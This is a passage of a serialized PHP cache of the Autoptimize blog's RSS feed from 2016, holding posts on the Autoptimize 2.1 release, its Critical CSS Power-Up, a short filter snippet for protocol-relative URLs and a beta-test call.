href="http://blog.futtta.be/2016/03/15/why-would-you-still-be-on-php-5-2/" rel="bookmark" title="Why would you still be on PHP 5.2?">Why would you still be on PHP 5.2? </a></li>\n<li><a href="http://blog.futtta.be/2012/11/06/dipping-below-the-magical-1-second-page-load-time/" rel="bookmark" title="Dipping below the magical 1 second page load time">Dipping below the magical 1 second page load time </a></li>\n</ul></p>\n</div>\n<img src="http://feeds.feedburner.com/~r/futtta_autoptimize/~4/NcmcF0UfG5s" height="1" width="1" alt=""/>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:36:"http://wellformedweb.org/CommentAPI/";a:1:{s:10:"commentRss";a:1:{i:0;a:5:{s:4:"data";s:89:"http://blog.futtta.be/2016/09/15/autoptimize-cache-size-the-canary-in-the-coal-mine/feed/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:38:"http://purl.org/rss/1.0/modules/slash/";a:1:{s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:2:"10";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:42:"http://rssnamespace.org/feedburner/ext/1.0";a:1:{s:8:"origLink";a:1:{i:0;a:5:{s:4:"data";s:84:"http://blog.futtta.be/2016/09/15/autoptimize-cache-size-the-canary-in-the-coal-mine/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:6;a:6:{s:4:"data";s:60:"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n		\n		\n		\n\n		\n		\n				\n			\n		\n		";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:6:{s:0:"";a:7:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:43:"Autoptimize 2.1 and first Power-Up released";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:65:"http://feedproxy.google.com/~r/futtta_autoptimize/~3/tUrnEBFcTw4/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:86:"http://blog.futtta.be/2016/09/04/autoptimize-2-1-and-first-power-up-released/#comments";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Sun, 04 Sep 2016 06:10:42 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:7:{i:0;a:5:{s:4:"data";s:11:"autoptimize";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:1;a:5:{s:4:"data";s:7:"lang:en";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:2;a:5:{s:4:"data";s:18:"optimizing matters";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:3;a:5:{s:4:"data";s:15:"active installs";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:4;a:5:{s:4:"data";s:24:"autoptimize critical css";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:5;a:5:{s:4:"data";s:8:"power-up";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:6;a:5:{s:4:"data";s:7:"release";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:30:"http://blog.futtta.be/?p=10382";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:364:"Yesterday evening I released Autoptimize 2.1 and the first Power-Up to manage critical CSS has been made available as a optional service over at criticalcss.com. This short video explains some of the logic behind the Autoptimize Critical CSS Power-Up: But let&#8217;s not forget about Autoptimize 2.1! The new features include: Autoptimize now appears in the [...]";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:5:"frank";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:2886:"<p>Yesterday evening I released <strong>Autoptimize 2.1</strong> and the first Power-Up to manage critical CSS has been made available as a optional service over at <a href="http://misc.optimizingmatters.com/partners/?from=blogpost&amp;partner=critcss">criticalcss.com</a>. This short video explains some of the logic behind the <strong>Autoptimize Critical CSS Power-Up</strong>:</p>\n<p><a href="http://blog.futtta.be/2016/09/04/autoptimize-2-1-and-first-power-up-released/"><img src="https://i.ytimg.com/vi/S5sjZRWsgrM/hqdefault.jpg" alt="YouTube Video"></a><br />Watch this video <a href="http://youtu.be/S5sjZRWsgrM">on YouTube</a>.</p>\n<p>But let&#8217;s not forget about Autoptimize 2.1! The new features include:</p>\n<ul>\n<li>Autoptimize now appears in the admin-toolbar with an easy view on cache size and the possibility to purge the cache (thanks to <a href="https://github.com/pablocusto" rel="nofollow">Pablo Custo</a>)</li>\n<li>A &#8220;More Optimization&#8221;-tab is shown with info about optimization tools- and services.</li>\n<li>settings-screen now accepts protocol-relative URL for CDN base URL</li>\n<li>admin GUI updated and responsiveness added</li>\n<li>If cache size becomes too big, a mail will be sent to the site admin</li>\n<li>power-users can enable Autoptimize to pre-gzip the autoptimized files with a filter</li>\n<li>new (smarter) defaults for JS and CSS optimization</li>\n</ul>\n<p>Although excluding jQuery from autoptimization by default might seem counter-intuitive, the &#8220;smarter&#8221; defaults should allow <strong>more Autoptimize installs to work out-of-the-box</strong> (including on sites run by people who might not be inclined to troubleshoot/ reconfigure Autoptimize in the first place).</p>\n<p>And thanks to the release I now have a better idea of the <strong>number of active installs</strong> (which wordpress.org lists as +100000); 2.1 was downloaded 3239 times yesterday evening and it is listed as running on 1.8% sites. Simple math learns that Autoptimize is currently active on approx. <strong>180000</strong> WordPress websites. Let&#8217;s aim for 200K by the end of 2016! :-)</p>\n<div class=\'yarpp-related-rss\'>\n<p>Possibly related twitterless twaddle:<ul>\n<li><a href="http://blog.futtta.be/2016/09/02/almost-time-to-announce/" rel="bookmark" title="Almost time to announce">Almost time to announce </a></li>\n<li><a href="http://blog.futtta.be/2016/02/03/autoptimize-powerup-sneak-peak-noptimize/" rel="bookmark" title="Autoptimize Power-Up sneak peek; Noptimize">Autoptimize Power-Up sneak peek; Noptimize </a></li>\n<li><a href="http://blog.futtta.be/2016/02/29/heads-up-autoptimize-minor-release/" rel="bookmark" title="Heads up: Autoptimize minor release">Heads up: Autoptimize minor release </a></li>\n</ul></p>\n</div>\n<img src="http://feeds.feedburner.com/~r/futtta_autoptimize/~4/tUrnEBFcTw4" height="1" width="1" alt=""/>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:36:"http://wellformedweb.org/CommentAPI/";a:1:{s:10:"commentRss";a:1:{i:0;a:5:{s:4:"data";s:82:"http://blog.futtta.be/2016/09/04/autoptimize-2-1-and-first-power-up-released/feed/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:38:"http://purl.org/rss/1.0/modules/slash/";a:1:{s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:2:"10";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:42:"http://rssnamespace.org/feedburner/ext/1.0";a:1:{s:8:"origLink";a:1:{i:0;a:5:{s:4:"data";s:77:"http://blog.futtta.be/2016/09/04/autoptimize-2-1-and-first-power-up-released/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:7;a:6:{s:4:"data";s:69:"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n		\n		\n		\n		\n		\n		\n\n		\n		\n				\n			\n		\n		";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:6:{s:0:"";a:7:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:23:"Almost time to announce";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:65:"http://feedproxy.google.com/~r/futtta_autoptimize/~3/e9COTtG7a6o/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:65:"http://blog.futtta.be/2016/09/02/almost-time-to-announce/#respond";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Fri, 02 Sep 2016 05:12:22 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:10:{i:0;a:5:{s:4:"data";s:11:"autoptimize";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:1;a:5:{s:4:"data";s:7:"lang:en";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:2;a:5:{s:4:"data";s:18:"optimizing matters";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:3;a:5:{s:4:"data";s:11:"performance";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:4;a:5:{s:4:"data";s:9:"wordpress";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:5;a:5:{s:4:"data";s:24:"autoptimize critical css";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:6;a:5:{s:4:"data";s:20:"autoptimize power-up";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:7;a:5:{s:4:"data";s:15:"criticalcss.com";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:8;a:5:{s:4:"data";s:13:"jonas ohlsson";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:9;a:5:{s:4:"data";s:12:"this weekend";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:30:"http://blog.futtta.be/?p=10380";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:49:"Almost, but exclusively for you guys &#38; girls;";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:5:"frank";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:1134:"<p>Almost, but exclusively for you guys &amp; girls;</p>\n<p><a href="http://blog.futtta.be/2016/09/02/almost-time-to-announce/"><img src="https://i.ytimg.com/vi/S5sjZRWsgrM/hqdefault.jpg" alt="YouTube Video"></a><br />Watch this video <a href="http://youtu.be/S5sjZRWsgrM">on YouTube</a>.</p>\n<div class=\'yarpp-related-rss\'>\n<p>Possibly related twitterless twaddle:<ul>\n<li><a href="http://blog.futtta.be/2015/07/21/want-to-beta-test-autoptimize-power-ups/" rel="bookmark" title="Want to beta-test Autoptimize power-ups?">Want to beta-test Autoptimize power-ups? </a></li>\n<li><a href="http://blog.futtta.be/2016/02/03/autoptimize-powerup-sneak-peak-noptimize/" rel="bookmark" title="Autoptimize Power-Up sneak peek; Noptimize">Autoptimize Power-Up sneak peek; Noptimize </a></li>\n<li><a href="http://blog.futtta.be/2012/11/06/dipping-below-the-magical-1-second-page-load-time/" rel="bookmark" title="Dipping below the magical 1 second page load time">Dipping below the magical 1 second page load time </a></li>\n</ul></p>\n</div>\n<img src="http://feeds.feedburner.com/~r/futtta_autoptimize/~4/e9COTtG7a6o" height="1" width="1" alt=""/>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:36:"http://wellformedweb.org/CommentAPI/";a:1:{s:10:"commentRss";a:1:{i:0;a:5:{s:4:"data";s:62:"http://blog.futtta.be/2016/09/02/almost-time-to-announce/feed/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:38:"http://purl.org/rss/1.0/modules/slash/";a:1:{s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:1:"0";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:42:"http://rssnamespace.org/feedburner/ext/1.0";a:1:{s:8:"origLink";a:1:{i:0;a:5:{s:4:"data";s:57:"http://blog.futtta.be/2016/09/02/almost-time-to-announce/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:8;a:6:{s:4:"data";s:51:"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n\n		\n		\n				\n			\n		\n		";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:6:{s:0:"";a:7:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:60:"How to force Autoptimize to output protocol-relative URL’s";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:65:"http://feedproxy.google.com/~r/futtta_autoptimize/~3/1gJ-IhZMIOc/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:100:"http://blog.futtta.be/2016/08/02/how-to-force-autoptimize-to-output-protocol-relative-urls/#comments";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Tue, 02 Aug 2016 06:07:40 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:4:{i:0;a:5:{s:4:"data";s:11:"autoptimize";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:1;a:5:{s:4:"data";s:7:"lang:en";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:2;a:5:{s:4:"data";s:13:"code snippets";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:3;a:5:{s:4:"data";s:21:"protocol-relative url";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:30:"http://blog.futtta.be/?p=10360";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:335:"Autoptimize by default uses WordPress&#8217; internal logic to determine if a URL should be HTTP or HTTPS. But in some cases WordPress may not be fully aware it is on HTTPS, or maybe you want part of your site HTTP and another part (cart &#038; checkout?) in HTTPS. Protocol-relative URL&#8217;s to the rescue, except Autoptimize [...]";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:5:"frank";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:1781:"<p>Autoptimize by default uses WordPress&#8217; internal logic to determine if a URL should be HTTP or HTTPS. But in some cases WordPress may not be fully aware it is on HTTPS, or maybe you want part of your site HTTP and another part (cart &#038; checkout?) in HTTPS. <a href="http://www.paulirish.com/2010/the-protocol-relative-url/">Protocol-relative URL&#8217;s</a> to the rescue, except Autoptimize does not do those, right?</p>\n<p>Well, not by default no. But the following code-snippet uses AO&#8217;s API to output protocol-relative URL&#8217;s (warning: not tested thoroughly in a production environment, but I&#8217;ll happy to assist in case of problems):</p>\n<pre class="brush: php; title: ; notranslate">\nadd_filter(\'autoptimize_filter_cache_getname\',\'protocollesser\');\nadd_filter(\'autoptimize_filter_base_replace_cdn\',\'protocollesser\');\nfunction protocollesser($urlIn) {\n  $urlOut=preg_replace(\'/https?:/i\',\'\',$urlIn);\n  return $urlOut;\n}\n</pre>\n<div class=\'yarpp-related-rss\'>\n<p>Possibly related twitterless twaddle:<ul>\n<li><a href="http://blog.futtta.be/2015/10/07/3-interesting-wordpress-plugins/" rel="bookmark" title="3 interesting WordPress plugins">3 interesting WordPress plugins </a></li>\n<li><a href="http://blog.futtta.be/2013/10/04/i-want-you-for-autoptimize-1-7-0-and-beyond/" rel="bookmark" title="I want you for Autoptimize 1.7.0 (and beyond)!">I want you for Autoptimize 1.7.0 (and beyond)! </a></li>\n<li><a href="http://blog.futtta.be/2014/09/10/wp-seo-vs-autoptimize-who-broke-your-wordpress/" rel="bookmark" title="WP SEO vs Autoptimize; who broke your WordPress?">WP SEO vs Autoptimize; who broke your WordPress? </a></li>\n</ul></p>\n</div>\n<img src="http://feeds.feedburner.com/~r/futtta_autoptimize/~4/1gJ-IhZMIOc" height="1" width="1" alt=""/>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:36:"http://wellformedweb.org/CommentAPI/";a:1:{s:10:"commentRss";a:1:{i:0;a:5:{s:4:"data";s:96:"http://blog.futtta.be/2016/08/02/how-to-force-autoptimize-to-output-protocol-relative-urls/feed/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:38:"http://purl.org/rss/1.0/modules/slash/";a:1:{s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:1:"8";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:42:"http://rssnamespace.org/feedburner/ext/1.0";a:1:{s:8:"origLink";a:1:{i:0;a:5:{s:4:"data";s:91:"http://blog.futtta.be/2016/08/02/how-to-force-autoptimize-to-output-protocol-relative-urls/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:9;a:6:{s:4:"data";s:57:"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n		\n		\n\n		\n		\n				\n			\n		\n		";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:6:{s:0:"";a:7:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:42:"Preparing (for) Autoptimize 2.0.3 or 2.1.0";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:65:"http://feedproxy.google.com/~r/futtta_autoptimize/~3/_sch1G_dAw8/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:83:"http://blog.futtta.be/2016/07/24/preparing-for-autoptimize-2-0-3-or-2-1-0/#comments";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Sun, 24 Jul 2016 08:46:08 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:6:{i:0;a:5:{s:4:"data";s:11:"autoptimize";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:1;a:5:{s:4:"data";s:7:"lang:en";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:2;a:5:{s:4:"data";s:9:"wordpress";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:3;a:5:{s:4:"data";s:16:"autoptimize beta";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:4;a:5:{s:4:"data";s:4:"beta";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:5;a:5:{s:4:"data";s:4:"test";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:30:"http://blog.futtta.be/?p=10353";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:354:"It&#8217;s that time of the year again where I humbly ask Autoptimize&#8217;s users to download and test the &#8220;beta&#8221;-version of the upcoming release. I&#8217;m not entirely sure whether this should be 2.0.3 (a minor release) or 2.1.0 (a major one), but I&#8217;ll let you guys &#38; girls decide, OK? Anyway, the following changes are in [...]";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:5:"frank";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:3061:"<p><a href="http://static-blog.futtta.be/wp-content/uploads/2016/07/ao_pablos_menu.png"><img class="alignright size-medium wp-image-10354" src="http://static-blog.futtta.be/wp-content/uploads/2016/07/ao_pablos_menu-300x183.png" alt="" width="300" height="183" srcset="http://static-blog.futtta.be/wp-content/uploads/2016/07/ao_pablos_menu-300x183.png 300w, http://static-blog.futtta.be/wp-content/uploads/2016/07/ao_pablos_menu.png 501w" sizes="(max-width: 300px) 100vw, 300px" /></a>It&#8217;s that time of the year again where I humbly ask Autoptimize&#8217;s users to download and test the &#8220;beta&#8221;-version of the upcoming release. I&#8217;m not entirely sure whether this should be 2.0.3 (a minor release) or 2.1.0 (a major one), but I&#8217;ll let you guys &amp; girls decide, OK?</p>\n<p>Anyway, the following changes are in said new release;</p>\n<ul>\n<li>Autoptimize now adds a small menu to the admin-toolbar (can be disabled with a filter) that shows the cache size and provides the possibility to purge the cache. A big thanks to <a href="https://github.com/pablocusto">Pablo Custo</a> for his hard work on this nice feature!</li>\n<li>If the cache size becomes too big, a mail will be sent to the site admin (pass `false` to `autoptimize_filter_cachecheck_sendmail` filter to disable or pass alternative email to the `autoptimize_filter_cachecheck_mailto` filter)</li>\n<li>An extra tab is shown (can be hidden with a filter) with information about <a href="http://blog.futtta.be/2016/02/03/autoptimize-powerup-sneak-peak-noptimize/">my upcoming premium</a> <a href="http://blog.futtta.be/2016/05/24/autoptimize-power-up-sneak-peak-critical-css/">power-ups</a> and other optimization tools- and services.</li>\n<li>Misc. bugfixes &amp; small improvements (see <a href="https://github.com/futtta/autoptimize/commits/master">the commit-log on GitHub</a>)</li>\n</ul>\n<p>So, if you&#8217;re curious about Pablo&#8217;s beautiful menu or if you just want to help Autoptimize out, <a href="https://downloads.wordpress.org/plugin/autoptimize.zip">download the beta</a> and provide me with your feedback. If all goes well, we&#8217;ll be able to push it (2.1.0?) out in the first half of August!</p>\n<div class=\'yarpp-related-rss\'>\n<p>Possibly related twitterless twaddle:<ul>\n<li><a href="http://blog.futtta.be/2015/12/09/bringing-autoptimize-2-0-beta-to-a-christmas-tree-near-you/" rel="bookmark" title="Bringing Autoptimize 2.0 (beta) to a Christmas-tree near you">Bringing Autoptimize 2.0 (beta) to a Christmas-tree near you </a></li>\n<li><a href="http://blog.futtta.be/2015/07/21/want-to-beta-test-autoptimize-power-ups/" rel="bookmark" title="Want to beta-test Autoptimize power-ups?">Want to beta-test Autoptimize power-ups? </a></li>\n<li><a href="http://blog.futtta.be/2016/02/29/heads-up-autoptimize-minor-release/" rel="bookmark" title="Heads up: Autoptimize minor release">Heads up: Autoptimize minor release </a></li>\n</ul></p>\n</div>\n<img src="http://feeds.feedburner.com/~r/futtta_autoptimize/~4/_sch1G_dAw8" height="1" width="1" alt=""/>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:36:"http://wellformedweb.org/CommentAPI/";a:1:{s:10:"commentRss";a:1:{i:0;a:5:{s:4:"data";s:79:"http://blog.futtta.be/2016/07/24/preparing-for-autoptimize-2-0-3-or-2-1-0/feed/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:38:"http://purl.org/rss/1.0/modules/slash/";a:1:{s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:2:"18";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:42:"http://rssnamespace.org/feedburner/ext/1.0";a:1:{s:8:"origLink";a:1:{i:0;a:5:{s:4:"data";s:74:"http://blog.futtta.be/2016/07/24/preparing-for-autoptimize-2-0-3-or-2-1-0/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}}}s:44:"http://purl.org/rss/1.0/modules/syndication/";a:2:{s:12:"updatePeriod";a:1:{i:0;a:5:{s:4:"data";s:6:"hourly";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:15:"updateFrequency";a:1:{i:0;a:5:{s:4:"data";s:1:"1";s:7:"attribs";a:0:{